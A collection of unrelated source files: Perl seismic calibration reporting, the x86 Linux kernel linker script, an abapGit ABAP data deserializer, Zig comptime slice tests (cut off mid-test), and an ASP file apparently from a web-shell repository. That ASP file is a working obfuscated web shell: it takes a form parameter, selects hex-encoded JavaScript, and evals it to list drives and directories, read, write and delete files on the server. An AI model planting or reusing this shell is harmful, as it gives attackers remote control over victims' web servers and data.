$plots{$sta}{BHZ}{dlmodel} $plots{$sta}{BHZ}{dlident} "; print CAL "Sensor $plots{$sta}{BHZ}{snmodel} $plots{$sta}{BHZ}{snident}\n"; printf CAL "%s type - %s duration - %d refchan - %s response type - %s\n", strydtime($plots{$sta}{BHE}{time}), $plots{$sta}{BHE}{dlcaltype}, $plots{$sta}{BHE}{duration}, $plots{$sta}{BHE}{rchan}, $plots{$sta}{BHE}{rsptype}; printf CAL "Sensor gains BHZ %6d\n", $plots{$sta}{BHZ}{sngen}; $cmd .= "-a $plots{$sta}{BHZ}{pdffull} "; } if (exists $problems{$sta}{BHN}) { printf CAL "\nBHN Calibration Problem info\n"; foreach $time (keys %{ $problems{$sta}{BHN} }) { print CAL "Datalogger $plots{$sta}{BHN}{dlmodel} $plots{$sta}{BHN}{dlident} "; print CAL "Sensor $plots{$sta}{BHN}{snmodel} $plots{$sta}{BHN}{snident}\n"; printf CAL "%s type - %s duration - %d refchan - %s response type - %s\n", strydtime($time), $problems{$sta}{BHN}{$time}{dlcaltype}, $problems{$sta}{BHN}{$time}{duration}, $problems{$sta}{BHN}{$time}{rchan}, $problems{$sta}{BHN}{$time}{rsptype}; printf CAL "Sensor gains BHN %6d <- failed test \"%s\"\n\n", $problems{$sta}{BHN}{$time}{sngen} , $problems{$sta}{BHN}{$time}{error}; $cmd .= "-a $problems{$sta}{BHN}{$time}{pdffull} "; } } else { printf CAL "\nBHN Calibration info\n"; print CAL "Datalogger $plots{$sta}{BHN}{dlmodel} $plots{$sta}{BHN}{dlident} "; print CAL "Sensor $plots{$sta}{BHN}{snmodel} $plots{$sta}{BHN}{snident}\n"; printf CAL "%s type - %s duration - %d refchan - %s response type - %s\n", strydtime($plots{$sta}{BHN}{time}), $plots{$sta}{BHN}{dlcaltype}, $plots{$sta}{BHN}{duration}, $plots{$sta}{BHN}{rchan}, $plots{$sta}{BHN}{rsptype}; printf CAL "Sensor gains BHN %6d\n", $plots{$sta}{BHN}{sngen}; $cmd .= "-a $plots{$sta}{BHN}{pdffull} "; } if (exists $problems{$sta}{BHE}) { printf CAL "\nBHE Calibration Problem info\n"; foreach $time (keys %{ $problems{$sta}{BHE} }) { print CAL "Datalogger $plots{$sta}{BHE}{dlmodel} $plots{$sta}{BHE}{dlident} "; print CAL "Sensor $plots{$sta}{BHE}{snmodel} $plots{$sta}{BHE}{snident}\n"; printf CAL "%s type - %s duration - %d refchan - %s response type - %s\n", strydtime($time), $problems{$sta}{BHE}{$time}{dlcaltype}, $problems{$sta}{BHE}{$time}{duration}, $problems{$sta}{BHE}{$time}{rchan}, $problems{$sta}{BHE}{$time}{rsptype}; printf CAL "Sensor gains BHE %6d <- failed test \"%s\"\n\n", $problems{$sta}{BHE}{$time}{sngen} , $problems{$sta}{BHE}{$time}{error}; $cmd .= "-a $problems{$sta}{BHE}{$time}{pdffull} "; } } else { printf CAL "\nBHE Calibration info\n"; print CAL "Datalogger $plots{$sta}{BHE}{dlmodel} $plots{$sta}{BHE}{dlident} "; print CAL "Sensor $plots{$sta}{BHE}{snmodel} $plots{$sta}{BHE}{snident}\n"; printf CAL "%s type - %s duration - %d refchan - %s response type - %s\n", strydtime($plots{$sta}{BHE}{time}), $plots{$sta}{BHE}{dlcaltype}, $plots{$sta}{BHE}{duration}, $plots{$sta}{BHE}{rchan}, $plots{$sta}{BHE}{rsptype}; printf CAL "Sensor gains BHE %6d\n", $plots{$sta}{BHE}{sngen}; $cmd .= "-a $plots{$sta}{BHE}{pdffull} "; } print (CAL "-------------------------------------------------------\n\n"); close(CAL); $cmd = "rtmail -s \"Calibration Sequence Report - $sta Problem\" "; $cmd .= "$opt_M "; $cmd .= "< /tmp/cal"; } else { print CAL "Datalogger $plots{$sta}{BHZ}{dlmodel} $plots{$sta}{BHZ}{dlident}\n\n"; print CAL "Sensor $plots{$sta}{BHZ}{snmodel} $plots{$sta}{BHZ}{snident}\n\n"; printf CAL "Calibration info\n"; printf CAL "%s type - %s duration - %d refchan - %s response type - %s\n", strydtime($plots{$sta}{BHN}{time}), $plots{$sta}{BHN}{dlcaltype}, $plots{$sta}{BHN}{duration}, $plots{$sta}{BHN}{rchan}, $plots{$sta}{BHN}{rsptype}; printf CAL "%s type - %s duration - %d refchan - %s response type - %s\n\n", strydtime($plots{$sta}{BHE}{time}), $plots{$sta}{BHE}{dlcaltype}, $plots{$sta}{BHE}{duration}, $plots{$sta}{BHE}{rchan}, $plots{$sta}{BHE}{rsptype}; printf CAL "Sensor gains BHZ %6d\n BHN %6d\n BHE %6d \n\n", $plots{$sta}{BHZ}{sngen}, $plots{$sta}{BHN}{sngen}, $plots{$sta}{BHE}{sngen}; print ( CAL "-------------------------------------------------------\n\n"); close ( CAL ); $cmd = "rtmail -s \"Calibration Sequence Report - $sta\" "; $cmd .= "-a $plots{$sta}{BHZ}{pdffull} "; $cmd .= "-a $plots{$sta}{BHN}{pdffull} "; $cmd .= "-a $plots{$sta}{BHE}{pdffull} "; $cmd .= "$opt_M "; $cmd .= "< /tmp/cal"; } if ( $opt_M ) { if ( $opt_g ) { run_cmd( $cmd ) ; } else { run_cmd( $cmd ) if (exists $plots{$sta}{problem}); } } } }
XProc
4
jreyes1108/antelope_contrib
bin/usarray/q330_sensor_response/q330_sensor_response.xpl
[ "BSD-2-Clause", "MIT" ]
/* * ld script for the x86 kernel * * Historic 32-bit version written by Martin Mares <mj@atrey.karlin.mff.cuni.cz> * * Modernisation, unification and other changes and fixes: * Copyright (C) 2007-2009 Sam Ravnborg <sam@ravnborg.org> * * * Don't define absolute symbols until and unless you know that symbol * value is should remain constant even if kernel image is relocated * at run time. Absolute symbols are not relocated. If symbol value should * change if kernel is relocated, make the symbol section relative and * put it inside the section definition. */ #ifdef CONFIG_X86_32 #define LOAD_OFFSET __PAGE_OFFSET #else #define LOAD_OFFSET __START_KERNEL_map #endif #include <asm-generic/vmlinux.lds.h> #include <asm/asm-offsets.h> #include <asm/thread_info.h> #include <asm/page_types.h> #include <asm/cache.h> #include <asm/boot.h> #undef i386 /* in case the preprocessor is a 32bit one */ OUTPUT_FORMAT(CONFIG_OUTPUT_FORMAT, CONFIG_OUTPUT_FORMAT, CONFIG_OUTPUT_FORMAT) #ifdef CONFIG_X86_32 OUTPUT_ARCH(i386) ENTRY(phys_startup_32) jiffies = jiffies_64; #else OUTPUT_ARCH(i386:x86-64) ENTRY(phys_startup_64) jiffies_64 = jiffies; #endif #if defined(CONFIG_X86_64) && defined(CONFIG_DEBUG_RODATA) /* * On 64-bit, align RODATA to 2MB so that even with CONFIG_DEBUG_RODATA * we retain large page mappings for boundaries spanning kernel text, rodata * and data sections. * * However, kernel identity mappings will have different RWX permissions * to the pages mapping to text and to the pages padding (which are freed) the * text section. Hence kernel identity mappings will be broken to smaller * pages. For 64-bit, kernel text and kernel identity mappings are different, * so we can enable protection checks that come with CONFIG_DEBUG_RODATA, * as well as retain 2MB large page mappings for kernel text. */ #define X64_ALIGN_DEBUG_RODATA_BEGIN . = ALIGN(HPAGE_SIZE); #define X64_ALIGN_DEBUG_RODATA_END \ . = ALIGN(HPAGE_SIZE); \ __end_rodata_hpage_align = .; #else #define X64_ALIGN_DEBUG_RODATA_BEGIN #define X64_ALIGN_DEBUG_RODATA_END #endif PHDRS { text PT_LOAD FLAGS(5); /* R_E */ data PT_LOAD FLAGS(6); /* RW_ */ #ifdef CONFIG_X86_64 #ifdef CONFIG_SMP percpu PT_LOAD FLAGS(6); /* RW_ */ #endif init PT_LOAD FLAGS(7); /* RWE */ #endif note PT_NOTE FLAGS(0); /* ___ */ } SECTIONS { #ifdef CONFIG_X86_32 . = LOAD_OFFSET + LOAD_PHYSICAL_ADDR; phys_startup_32 = startup_32 - LOAD_OFFSET; #else . = __START_KERNEL; phys_startup_64 = startup_64 - LOAD_OFFSET; #endif /* Text and read-only data */ .text : AT(ADDR(.text) - LOAD_OFFSET) { _text = .; /* bootstrapping code */ HEAD_TEXT . = ALIGN(8); _stext = .; TEXT_TEXT SCHED_TEXT LOCK_TEXT KPROBES_TEXT ENTRY_TEXT IRQENTRY_TEXT *(.fixup) *(.gnu.warning) /* End of text section */ _etext = .; } :text = 0x9090 NOTES :text :note EXCEPTION_TABLE(16) :text = 0x9090 #if defined(CONFIG_DEBUG_RODATA) /* .text should occupy whole number of pages */ . = ALIGN(PAGE_SIZE); #endif X64_ALIGN_DEBUG_RODATA_BEGIN RO_DATA(PAGE_SIZE) X64_ALIGN_DEBUG_RODATA_END /* Data */ .data : AT(ADDR(.data) - LOAD_OFFSET) { /* Start of data section */ _sdata = .; /* init_task */ INIT_TASK_DATA(THREAD_SIZE) #ifdef CONFIG_X86_32 /* 32 bit has nosave before _edata */ NOSAVE_DATA #endif PAGE_ALIGNED_DATA(PAGE_SIZE) CACHELINE_ALIGNED_DATA(L1_CACHE_BYTES) DATA_DATA CONSTRUCTORS /* rarely changed data like cpu maps */ READ_MOSTLY_DATA(INTERNODE_CACHE_BYTES) /* End of data section */ _edata = .; } :data . = ALIGN(PAGE_SIZE); __vvar_page = .; .vvar : AT(ADDR(.vvar) - LOAD_OFFSET) { /* work around gold bug 13023 */ __vvar_beginning_hack = .; /* Place all vvars at the offsets in asm/vvar.h. */ #define EMIT_VVAR(name, offset) \ . = __vvar_beginning_hack + offset; \ *(.vvar_ ## name) #define __VVAR_KERNEL_LDS #include <asm/vvar.h> #undef __VVAR_KERNEL_LDS #undef EMIT_VVAR /* * Pad the rest of the page with zeros. Otherwise the loader * can leave garbage here. */ . = __vvar_beginning_hack + PAGE_SIZE; } :data . = ALIGN(__vvar_page + PAGE_SIZE, PAGE_SIZE); /* Init code and data - will be freed after init */ . = ALIGN(PAGE_SIZE); .init.begin : AT(ADDR(.init.begin) - LOAD_OFFSET) { __init_begin = .; /* paired with __init_end */ } #if defined(CONFIG_X86_64) && defined(CONFIG_SMP) /* * percpu offsets are zero-based on SMP. PERCPU_VADDR() changes the * output PHDR, so the next output section - .init.text - should * start another segment - init. */ PERCPU_VADDR(INTERNODE_CACHE_BYTES, 0, :percpu) ASSERT(SIZEOF(.data..percpu) < CONFIG_PHYSICAL_START, "per-CPU data too large - increase CONFIG_PHYSICAL_START") #endif INIT_TEXT_SECTION(PAGE_SIZE) #ifdef CONFIG_X86_64 :init #endif INIT_DATA_SECTION(16) .x86_cpu_dev.init : AT(ADDR(.x86_cpu_dev.init) - LOAD_OFFSET) { __x86_cpu_dev_start = .; *(.x86_cpu_dev.init) __x86_cpu_dev_end = .; } #ifdef CONFIG_X86_INTEL_MID .x86_intel_mid_dev.init : AT(ADDR(.x86_intel_mid_dev.init) - \ LOAD_OFFSET) { __x86_intel_mid_dev_start = .; *(.x86_intel_mid_dev.init) __x86_intel_mid_dev_end = .; } #endif /* * start address and size of operations which during runtime * can be patched with virtualization friendly instructions or * baremetal native ones. Think page table operations. * Details in paravirt_types.h */ . = ALIGN(8); .parainstructions : AT(ADDR(.parainstructions) - LOAD_OFFSET) { __parainstructions = .; *(.parainstructions) __parainstructions_end = .; } /* * struct alt_inst entries. From the header (alternative.h): * "Alternative instructions for different CPU types or capabilities" * Think locking instructions on spinlocks. */ . = ALIGN(8); .altinstructions : AT(ADDR(.altinstructions) - LOAD_OFFSET) { __alt_instructions = .; *(.altinstructions) __alt_instructions_end = .; } /* * And here are the replacement instructions. The linker sticks * them as binary blobs. The .altinstructions has enough data to * get the address and the length of them to patch the kernel safely. */ .altinstr_replacement : AT(ADDR(.altinstr_replacement) - LOAD_OFFSET) { *(.altinstr_replacement) } /* * struct iommu_table_entry entries are injected in this section. * It is an array of IOMMUs which during run time gets sorted depending * on its dependency order. After rootfs_initcall is complete * this section can be safely removed. */ .iommu_table : AT(ADDR(.iommu_table) - LOAD_OFFSET) { __iommu_table = .; *(.iommu_table) __iommu_table_end = .; } . = ALIGN(8); .apicdrivers : AT(ADDR(.apicdrivers) - LOAD_OFFSET) { __apicdrivers = .; *(.apicdrivers); __apicdrivers_end = .; } . = ALIGN(8); /* * .exit.text is discard at runtime, not link time, to deal with * references from .altinstructions and .eh_frame */ .exit.text : AT(ADDR(.exit.text) - LOAD_OFFSET) { EXIT_TEXT } .exit.data : AT(ADDR(.exit.data) - LOAD_OFFSET) { EXIT_DATA } #if !defined(CONFIG_X86_64) || !defined(CONFIG_SMP) PERCPU_SECTION(INTERNODE_CACHE_BYTES) #endif . = ALIGN(PAGE_SIZE); /* freed after init ends here */ .init.end : AT(ADDR(.init.end) - LOAD_OFFSET) { __init_end = .; } /* * smp_locks might be freed after init * start/end must be page aligned */ . = ALIGN(PAGE_SIZE); .smp_locks : AT(ADDR(.smp_locks) - LOAD_OFFSET) { __smp_locks = .; *(.smp_locks) . = ALIGN(PAGE_SIZE); __smp_locks_end = .; } #ifdef CONFIG_X86_64 .data_nosave : AT(ADDR(.data_nosave) - LOAD_OFFSET) { NOSAVE_DATA } #endif /* BSS */ . = ALIGN(PAGE_SIZE); .bss : AT(ADDR(.bss) - LOAD_OFFSET) { __bss_start = .; *(.bss..page_aligned) *(.bss) . = ALIGN(PAGE_SIZE); __bss_stop = .; } . = ALIGN(PAGE_SIZE); .brk : AT(ADDR(.brk) - LOAD_OFFSET) { __brk_base = .; . += 64 * 1024; /* 64k alignment slop space */ *(.brk_reservation) /* areas brk users have reserved */ __brk_limit = .; } _end = .; STABS_DEBUG DWARF_DEBUG /* Sections to be discarded */ DISCARDS /DISCARD/ : { *(.eh_frame) } } #ifdef CONFIG_X86_32 /* * The ASSERT() sink to . is intentional, for binutils 2.14 compatibility: */ . = ASSERT((_end - LOAD_OFFSET <= KERNEL_IMAGE_SIZE), "kernel image bigger than KERNEL_IMAGE_SIZE"); #else /* * Per-cpu symbols which need to be offset from __per_cpu_load * for the boot processor. */ #define INIT_PER_CPU(x) init_per_cpu__##x = x + __per_cpu_load INIT_PER_CPU(gdt_page); INIT_PER_CPU(irq_stack_union); /* * Build-time check on the image size: */ . = ASSERT((_end - _text <= KERNEL_IMAGE_SIZE), "kernel image bigger than KERNEL_IMAGE_SIZE"); #ifdef CONFIG_SMP . = ASSERT((irq_stack_union == 0), "irq_stack_union is not at start of per-cpu area"); #endif #endif /* CONFIG_X86_32 */ #ifdef CONFIG_KEXEC #include <asm/kexec.h> . = ASSERT(kexec_control_code_size <= KEXEC_CONTROL_CODE_MAX_SIZE, "kexec control code size is too big"); #endif
Linker Script
5
JavascriptID/sourcerer-app
src/test/resources/samples/langs/Linker Script/vmlinux.lds
[ "MIT" ]
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT> var Sp = String(Request.form('z')); var Fla = {'E':eval}; var St="" var A="H74H72H79H7BH76H61H72H20H53H3DH22H2DH3EH7CH22H2BH53H65H72H76H65H72H2EH4DH61H70H70H61H74H68H28H22H2FH22H29H2BH22H5CH74H22H3BH76H61H72H20H6FH46H73H6FH20H3DH20H53H65H72H76H65H72H2EH43H72H65H61H74H65H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH76H61H72H20H6FH44H72H69H76H65H72H73H20H3DH20H6FH46H73H6FH2EH44H72H69H76H65H73H3BH66H6FH72H28H76H61H72H20H78H3DH6EH65H77H20H45H6EH75H6DH65H72H61H74H6FH72H28H6FH44H72H69H76H65H72H73H29H3BH21H78H2EH61H74H45H6EH64H28H29H3BH78H2EH6DH6FH76H65H4EH65H78H74H28H29H29H20H7BH76H61H72H20H6FH44H72H69H76H65H72H20H3DH20H78H2EH69H74H65H6DH28H29H3BH53H2BH3DH6FH44H72H69H76H65H72H2EH50H61H74H68H3BH7DH53H2BH3DH22H7CH3CH2DH22H3BH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H53H29H3BH7DH63H61H74H63H68H28H65H29H7BH7D"; var B="H76H61H72H20H66H73H6FH20H3DH20H6EH65H77H20H41H63H74H69H76H65H58H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH0AH66H75H6EH63H74H69H6FH6EH20H77H6AH6AH28H62H29H7BH0AH76H61H72H20H63H3DH6EH65H77H20H45H6EH75H6DH65H72H61H74H6FH72H28H66H73H6FH2EH47H65H74H46H6FH6CH64H65H72H28H62H29H2EH53H75H62H46H6FH6CH64H65H72H73H29H3BH0AH66H6FH72H20H28H3BH21H63H2EH61H74H45H6EH64H28H29H3BH63H2EH6DH6FH76H65H4EH65H78H74H28H29H29H62H66H6FH28H63H2EH69H74H65H6DH28H29H29H3BH0AH76H61H72H20H66H3DH6EH65H77H20H45H6EH75H6DH65H72H61H74H6FH72H28H66H73H6FH2EH47H65H74H46H6FH6CH64H65H72H28H62H29H2EH66H69H6CH65H73H29H3BH0AH66H6FH72H20H28H3BH21H66H2EH61H74H45H6EH64H28H29H3BH66H2EH6DH6FH76H65H4EH65H78H74H28H29H29H62H66H69H28H66H2EH69H74H65H6DH28H29H29H0AH7DH0AH66H75H6EH63H74H69H6FH6EH20H62H66H6FH28H66H29H7BH53H2BH3DH66H2EH4EH61H6DH65H2BH22H5CH2FH5CH74H22H2BH66H2EH44H61H74H65H4CH61H73H74H4DH6FH64H69H66H69H65H64H2BH22H5CH74H30H5CH74H22H2BH66H2EH41H74H74H72H69H62H75H74H65H73H2BH22H5CH6EH22H3BH7DH0AH66H75H6EH63H74H69H6FH6EH20H62H66H69H28H66H29H7BH53H2BH3DH66H2EH4EH61H6DH65H2BH22H5CH74H22H2BH66H2EH44H61H74H65H4CH61H73H74H4DH6FH64H69H66H69H65H64H2BH22H5CH74H22H2BH66H2EH73H69H7AH65H2BH22H5CH74H22H2BH66H2EH41H74H74H72H69H62H75H74H65H73H2BH22H5CH6EH22H3BH7DH0AH76H61H72H20H53H3DH22H2DH3EH7CH22H3BH0AH77H6AH6AH28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH31H27H29H29H3BH0AH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H53H2BH22H7CH3CH2DH22H29H3B"; var C="H66H75H6EH63H74H69H6FH6EH20H77H6AH6AH28H66H29H7BH0AH74H72H79H7BH0AH76H61H72H20H66H73H6FH20H3DH20H6EH65H77H20H41H63H74H69H76H65H58H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH0AH76H61H72H20H66H3DH66H73H6FH2EH4FH70H65H6EH54H65H78H74H66H69H6CH65H28H66H2CH31H2CH30H29H3BH0AH78H69H65H3DH78H69H65H2BH66H2EH52H65H61H64H41H6CH6CH28H29H2BH22H7CH3CH2DH22H3BH0AH7DH63H61H74H63H68H28H65H29H7BH78H69H65H2BH3DH22H45H52H52H4FH52H3AH2FH2FHu6587Hu4EF6Hu8BFBHu53D6Hu5931Hu8D25H21H7CH3CH2DH22H7DH0AH7DH0AH76H61H72H20H78H69H65H3DH22H2DH3EH7CH22H3BH0AH77H6AH6AH28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH31H27H29H29H3BH0AH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H78H69H65H29H3B"; var D="H66H75H6EH63H74H69H6FH6EH20H77H6AH6AH28H66H29H7BH0AH74H72H79H7BH0AH76H61H72H20H66H73H6FH20H3DH20H6EH65H77H20H41H63H74H69H76H65H58H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH0AH76H61H72H20H66H3DH66H73H6FH2EH43H72H65H61H74H65H54H65H78H74H46H69H6CH65H28H66H2CH31H29H3BH0AH66H2EH57H72H69H74H65H28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH32H27H29H29H3BH0AH66H2EH63H6CH6FH73H65H28H29H3BH0AH78H69H65H2BH3DH22H31H7CH3CH2DH22H3BH0AH7DH63H61H74H63H68H28H65H29H7BH78H69H65H2BH3DH22H45H52H52H4FH52H3AH2FH2FHu6587Hu4EF6Hu5199Hu5165Hu5931Hu8D25H21H7CH3CH2DH22H7DH0AH7DH0AH76H61H72H20H78H69H65H3DH22H2DH3EH7CH22H3BH0AH77H6AH6AH28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH31H27H29H29H3BH0AH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H78H69H65H29H3B"; var E="H66H75H6EH63H74H69H6FH6EH20H77H6AH6AH28H66H29H7BH0AH74H72H79H7BH0AH76H61H72H20H66H73H6FH20H3DH20H6EH65H77H20H41H63H74H69H76H65H58H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH0AH66H73H6FH2EH44H65H6CH65H74H65H46H69H6CH65H28H66H2CH74H72H75H65H29H3BH0AH78H69H65H2BH3DH22H31H7CH3CH2DH22H3BH0AH74H72H79H7BH66H73H6FH2EH44H65H6CH65H74H65H46H6FH6CH64H65H72H28H66H2CH74H72H75H65H29H3BH7DH63H61H74H63H68H28H65H29H7BH7DH0AH7DH63H61H74H63H68H28H65H29H7BH78H69H65H2BH3DH22Hu5220Hu9664Hu5931Hu8D25H21H7CH3CH2DH22H3BH7DH0AH7DH0AH76H61H72H20H78H69H65H3DH22H2DH3EH7CH22H3BH0AH77H6AH6AH28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH31H27H29H29H3BH0AH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H78H69H65H29H3B" switch(Sp) { case "A": St=A; break; case "B": St=B; break; case "C": St=C; break; case "D": St=D; case "E": St=E; break; default: } Fla.E(unescape(St.replace(/H/g,"%"))+''); </SCRIPT>
ASP
2
laotun-s/webshell
caidao-shell/cutstomize.asp
[ "MIT" ]
CLASS zcl_abapgit_data_deserializer DEFINITION PUBLIC CREATE PRIVATE GLOBAL FRIENDS zcl_abapgit_data_factory . PUBLIC SECTION. INTERFACES zif_abapgit_data_deserializer . PROTECTED SECTION. PRIVATE SECTION. METHODS convert_json_to_itab IMPORTING !is_file TYPE zif_abapgit_definitions=>ty_file !ir_data TYPE REF TO data RAISING zcx_abapgit_exception . METHODS preview_database_changes IMPORTING !iv_name TYPE tadir-obj_name !it_where TYPE string_table !ir_data TYPE REF TO data RETURNING VALUE(rs_result) TYPE zif_abapgit_data_deserializer=>ty_result RAISING zcx_abapgit_exception . METHODS write_database_table IMPORTING !iv_name TYPE tadir-obj_name !ir_del TYPE REF TO data !ir_ins TYPE REF TO data RAISING zcx_abapgit_exception . METHODS read_database_table IMPORTING !iv_name TYPE tadir-obj_name !it_where TYPE string_table RETURNING VALUE(rr_data) TYPE REF TO data RAISING zcx_abapgit_exception . ENDCLASS. CLASS ZCL_ABAPGIT_DATA_DESERIALIZER IMPLEMENTATION. METHOD convert_json_to_itab. DATA lo_ajson TYPE REF TO zcl_abapgit_ajson. DATA lx_ajson TYPE REF TO zcx_abapgit_ajson_error. FIELD-SYMBOLS <lg_tab> TYPE ANY TABLE. ASSIGN ir_data->* TO <lg_tab>. TRY. lo_ajson = zcl_abapgit_ajson=>parse( zcl_abapgit_convert=>xstring_to_string_utf8( is_file-data ) ). lo_ajson->zif_abapgit_ajson~to_abap( IMPORTING ev_container = <lg_tab> ). CATCH zcx_abapgit_ajson_error INTO lx_ajson. zcx_abapgit_exception=>raise( lx_ajson->get_text( ) ). ENDTRY. ENDMETHOD. METHOD preview_database_changes. * method currently distinguishes between records be deleted and inserted (comparison of complete record) * to-do: compare records based on database key of table to determine updates to existing records DATA lr_data TYPE REF TO data. FIELD-SYMBOLS <lg_old> TYPE ANY TABLE. FIELD-SYMBOLS <lg_new> TYPE ANY TABLE. FIELD-SYMBOLS <ls_del> TYPE any. FIELD-SYMBOLS <ls_ins> TYPE any. FIELD-SYMBOLS <lg_del> TYPE ANY TABLE. FIELD-SYMBOLS <lg_ins> TYPE ANY TABLE. lr_data = read_database_table( iv_name = iv_name it_where = it_where ). ASSIGN lr_data->* TO <lg_old>. ASSIGN ir_data->* TO <lg_new>. rs_result-table = iv_name. rs_result-deletes = zcl_abapgit_data_utils=>build_table_itab( iv_name ). rs_result-inserts = zcl_abapgit_data_utils=>build_table_itab( iv_name ). ASSIGN rs_result-deletes->* TO <lg_del>. ASSIGN rs_result-inserts->* TO <lg_ins>. <lg_del> = <lg_old>. <lg_ins> = <lg_new>. " Remove identical records LOOP AT <lg_del> ASSIGNING <ls_del>. READ TABLE <lg_ins> ASSIGNING <ls_ins> FROM <ls_del>. IF sy-subrc = 0. DELETE TABLE <lg_del> FROM <ls_del>. DELETE TABLE <lg_ins> FROM <ls_ins>. ENDIF. ENDLOOP. ENDMETHOD. METHOD read_database_table. DATA lv_where LIKE LINE OF it_where. FIELD-SYMBOLS <lg_tab> TYPE ANY TABLE. rr_data = zcl_abapgit_data_utils=>build_table_itab( iv_name ). ASSIGN rr_data->* TO <lg_tab>. LOOP AT it_where INTO lv_where. SELECT * FROM (iv_name) APPENDING TABLE <lg_tab> WHERE (lv_where). ENDLOOP. IF lines( it_where ) = 0. SELECT * FROM (iv_name) INTO TABLE <lg_tab>. ENDIF. ENDMETHOD. METHOD write_database_table. FIELD-SYMBOLS <lg_del> TYPE ANY TABLE. FIELD-SYMBOLS <lg_ins> TYPE ANY TABLE. ASSIGN ir_del->* TO <lg_del>. ASSIGN ir_ins->* TO <lg_ins>. IF lines( <lg_del> ) > 0. DELETE (iv_name) FROM TABLE <lg_del>. IF sy-subrc <> 0. zcx_abapgit_exception=>raise( |Error deleting { lines( <lg_del> ) } records from table { iv_name }| ). ENDIF. ENDIF. IF lines( <lg_ins> ) > 0. INSERT (iv_name) FROM TABLE <lg_ins>. IF sy-subrc <> 0. zcx_abapgit_exception=>raise( |Error inserting { lines( <lg_ins> ) } records into table { iv_name }| ). ENDIF. ENDIF. ENDMETHOD. METHOD zif_abapgit_data_deserializer~actualize. * this method updates the database DATA ls_result LIKE LINE OF it_result. LOOP AT it_result INTO ls_result. write_database_table( iv_name = ls_result-table ir_del = ls_result-deletes ir_ins = ls_result-inserts ). ENDLOOP. ENDMETHOD. METHOD zif_abapgit_data_deserializer~deserialize. * this method does not persist any changes to the database DATA lt_configs TYPE zif_abapgit_data_config=>ty_config_tt. DATA ls_config LIKE LINE OF lt_configs. DATA lr_data TYPE REF TO data. DATA ls_file LIKE LINE OF it_files. DATA ls_result LIKE LINE OF rt_result. lt_configs = ii_config->get_configs( ). LOOP AT lt_configs INTO ls_config. lr_data = zcl_abapgit_data_utils=>build_table_itab( ls_config-name ). READ TABLE it_files INTO ls_file WITH KEY file_path COMPONENTS path = zif_abapgit_data_config=>c_default_path filename = zcl_abapgit_data_utils=>build_filename( ls_config ). IF sy-subrc = 0. convert_json_to_itab( ir_data = lr_data is_file = ls_file ). ls_result = preview_database_changes( iv_name = ls_config-name it_where = ls_config-where ir_data = lr_data ). INSERT ls_result INTO TABLE rt_result. ENDIF. ENDLOOP. ENDMETHOD. ENDCLASS.
ABAP
5
Manny27nyc/abapGit
src/data/zcl_abapgit_data_deserializer.clas.abap
[ "MIT" ]
test "comptime slice-sentinel in bounds (unterminated)" { // array comptime { var target = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; const slice = target[0..3 :'d']; _ = slice; } // ptr_array comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target = &buf; const slice = target[0..3 :'d']; _ = slice; } // vector_ConstPtrSpecialBaseArray comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*]u8 = &buf; const slice = target[0..3 :'d']; _ = slice; } // vector_ConstPtrSpecialRef comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*]u8 = @ptrCast([*]u8, &buf); const slice = target[0..3 :'d']; _ = slice; } // cvector_ConstPtrSpecialBaseArray comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*c]u8 = &buf; const slice = target[0..3 :'d']; _ = slice; } // cvector_ConstPtrSpecialRef comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*c]u8 = @ptrCast([*c]u8, &buf); const slice = target[0..3 :'d']; _ = slice; } // slice comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: []u8 = &buf; const slice = target[0..3 :'d']; _ = slice; } } test "comptime slice-sentinel in bounds (end,unterminated)" { // array comptime { var target = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{0xff} ** 10; const slice = target[0..13 :0xff]; _ = slice; } // ptr_array comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{0xff} ** 10; var target = &buf; const slice = target[0..13 :0xff]; _ = slice; } // vector_ConstPtrSpecialBaseArray comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{0xff} ** 10; var target: [*]u8 = &buf; const slice = target[0..13 :0xff]; _ = slice; } // vector_ConstPtrSpecialRef comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{0xff} ** 10; var target: [*]u8 = @ptrCast([*]u8, &buf); const slice = target[0..13 :0xff]; _ = slice; } // cvector_ConstPtrSpecialBaseArray comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{0xff} ** 10; var target: [*c]u8 = &buf; const slice = target[0..13 :0xff]; _ = slice; } // 